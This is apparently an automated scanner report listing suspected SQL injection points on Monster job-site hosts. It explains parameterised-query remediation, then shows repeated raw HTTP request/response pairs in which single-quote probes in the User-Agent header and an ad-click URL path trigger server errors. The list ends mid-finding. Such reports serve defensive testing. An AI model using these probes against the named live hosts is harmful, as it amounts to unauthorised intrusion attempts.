SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: about.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 Date: Fri, 26 Nov 2010 19:31:43 GMT Content-Length: 1208 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
Request 2
GET / HTTP/1.1 Host: about.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Length: 12741 Content-Type: text/html; Charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDSQTDTBST=EPHKPKPDCIJBEIJODACPONPE; path=/ Date: Fri, 26 Nov 2010 19:31:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-ca" xml:lang="en-ca">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=341042&AdID=417423&TargetID=119775&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18062,33349,38779,39959,39962,42970,49534,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,119775,68086,106821&Values=77,85,94,211,412,1053,1435,3549,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.randstad.ca/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=341042&AdID=417423&TargetID=119775&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18062,33349,38779,39959,39962,42970,49534,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,119775,68086,106821&Values=77,85,94,211,412,1053,1435,3549,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.randstad.ca/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.randstad.ca/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=345735&AdID=423596&TargetID=88583&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49426,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,88583,106821&Values=77,85,94,211,412,667,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32197,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/homedepot/2008Q1En/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=345735&AdID=423596&TargetID=88583&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49426,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,88583,106821&Values=77,85,94,211,412,667,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32197,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/homedepot/2008Q1En/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://media.monster.ca/homedepot/2008Q1En/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=353792&AdID=432998&TargetID=129624&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49715,53574,55561,55882,60647,60648,60649,61243,61588,61839,62430,62432,66646,66729,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,72993,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129624&Values=77,85,94,139,197,370,412,668,1053,1435,4596,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32073,32196,32224,33248,41343,42640,46083,61236&RawValues=&Redirect=http:/clk.redcated/MON/go/265829206/direct/01/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=353792&AdID=432998&TargetID=129624&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49715,53574,55561,55882,60647,60648,60649,61243,61588,61839,62430,62432,66646,66729,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,72993,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129624&Values=77,85,94,139,197,370,412,668,1053,1435,4596,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32073,32196,32224,33248,41343,42640,46083,61236&RawValues=&Redirect=http:/clk.redcated/MON/go/265829206/direct/01/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://clk.redcated/MON/go/265829206/direct/01/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect= HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect= HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://ads.monster.com:80/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:26:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:26:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://jdn.monster.com/render/adimagelog.aspx Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect= HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect= HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://ads.monster.com:80/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:26:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:26:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://jdn.monster.com/render/adimagelog.aspx Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=366310&AdID=446802&TargetID=68087&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49535,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,68087,106821&Values=77,85,94,211,412,1053,1435,4718,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/indigo/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=366310&AdID=446802&TargetID=68087&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49535,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,68087,106821&Values=77,85,94,211,412,1053,1435,4718,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/indigo/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://media.monster.ca/indigo/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=371110&AdID=452586&TargetID=67962&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,18059,33349,38779,39959,39962,42970,49430,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,67962,106821&Values=77,85,94,211,412,850,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.lowes.ca/careers/why_work_at_lowes.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=371110&AdID=452586&TargetID=67962&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,18059,33349,38779,39959,39962,42970,49430,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,67962,106821&Values=77,85,94,211,412,850,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.lowes.ca/careers/why_work_at_lowes.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.lowes.ca/careers/why_work_at_lowes.aspx Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=373962&AdID=456009&TargetID=125487&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49428,49715,53574,55561,55882,61588,62430,62432,66337,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,125487,127382,67963,92584,106821&Values=77,85,94,211,412,669,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.idealpersonnel.com/jobs/index.htm HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=373962&AdID=456009&TargetID=125487&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49428,49715,53574,55561,55882,61588,62430,62432,66337,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,125487,127382,67963,92584,106821&Values=77,85,94,211,412,669,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.idealpersonnel.com/jobs/index.htm HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.idealpersonnel.com/jobs/index.htm Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=374308&AdID=456354&TargetID=73789&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49715,53574,54687,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,73789,106821&Values=77,85,94,211,412,1053,1435,6027,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.goodlifefitness.monstermediaworks.ca/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
